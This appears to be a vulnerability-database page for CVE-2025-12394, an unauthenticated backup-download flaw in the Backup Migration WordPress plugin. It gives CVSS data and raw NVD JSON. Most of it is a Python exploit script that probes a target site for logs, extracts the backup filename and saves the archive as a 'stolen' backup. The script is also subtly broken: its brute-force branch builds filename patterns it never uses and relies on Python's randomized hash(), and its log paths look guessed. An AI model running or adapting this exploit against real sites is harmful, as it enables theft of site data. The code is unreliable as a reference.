Security Vulnerability Report
CVE-2025-12394 CVSS 5.9 MEDIUM

Published: 2025-11-24 06:15:46
Last Modified: 2026-04-15 00:35:42

Description

The Backup Migration WordPress plugin before 2.0.0 does not properly generate its backup path in certain server configurations, allowing unauthenticated users to fetch a log that discloses the backup filename. The backup archive is then downloadable without authentication.

CVSS Details

CVSS Score: 5.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Backup Migration WordPress plugin < 2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import re
import os

# CVE-2025-12394 PoC - Backup Migration WordPress Plugin Unauthorized Backup Download
# Target: WordPress site with vulnerable Backup Migration plugin < 2.0.0

target = "http://target-wordpress-site.com"
backup_endpoint = f"{target}/wp-content/backup-migration/"


def exploit_cve_2025_12394():
    """
    Exploitation steps:
    1. Fetch log file to disclose backup filename
    2. Construct backup path using disclosed information
    3. Download the backup archive without authentication
    """
    # Step 1: Try to access the backup log file that discloses backup filename
    log_paths = [
        "/wp-content/backups-dump.php",
        "/wp-content/backup-migration/log.php",
        "/wp-content/backup-migration/config.txt",
        "/wp-content/backups/info.txt"
    ]

    backup_filename = None
    for log_path in log_paths:
        try:
            response = requests.get(f"{target}{log_path}", timeout=10)
            if response.status_code == 200:
                # Extract backup filename from log content
                match = re.search(r'backup[_-]\w+\.zip', response.text)
                if match:
                    backup_filename = match.group(0)
                    print(f"[+] Found backup filename: {backup_filename}")
                    break
        except requests.RequestException as e:
            print(f"[-] Error accessing {log_path}: {e}")

    if not backup_filename:
        # Alternative: Brute force common backup filename patterns
        print("[*] Log file not accessible, attempting filename brute force...")
        common_patterns = [
            f"backup_{hash(target)}.zip",
            f"backup-{hash(target)}.zip"
        ]
        # Add common date-based patterns
        import datetime
        for i in range(30):
            date = datetime.datetime.now() - datetime.timedelta(days=i)
            common_patterns.append(f"backup_{date.strftime('%Y%m%d')}.zip")

    # Step 2 & 3: Download backup if filename is known
    if backup_filename:
        backup_urls = [
            f"{target}/wp-content/backups/{backup_filename}",
            f"{target}/wp-content/backup-migration/backups/{backup_filename}",
            f"{target}/wp-content/{backup_filename}"
        ]
        for url in backup_urls:
            print(f"[*] Trying to download from: {url}")
            response = requests.get(url, timeout=30)
            if response.status_code == 200 and len(response.content) > 1000:
                # Save the backup file
                output_file = f"stolen_backup_{backup_filename}"
                with open(output_file, 'wb') as f:
                    f.write(response.content)
                print(f"[+] SUCCESS! Backup downloaded: {output_file}")
                print(f"[+] File size: {len(response.content)} bytes")
                return True

    print("[-] Exploitation failed - backup not found or inaccessible")
    return False


if __name__ == "__main__":
    exploit_cve_2025_12394()
```

References

https://wpscan.com/vulnerability/e61293d0-2e1b-4dac-96c5-97fa17e38b16/

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12394",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-24T06:15:45.923",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Backup Migration WordPress plugin before 2.0.0 does not properly generate its backup path in certain server configurations, allowing unauthenticated users to fetch a log that discloses the backup filename. The backup archive is then downloadable without authentication."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 3.6
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/e61293d0-2e1b-4dac-96c5-97fa17e38b16/",
        "source": "[email protected]"
      }
    ]
  }
}
```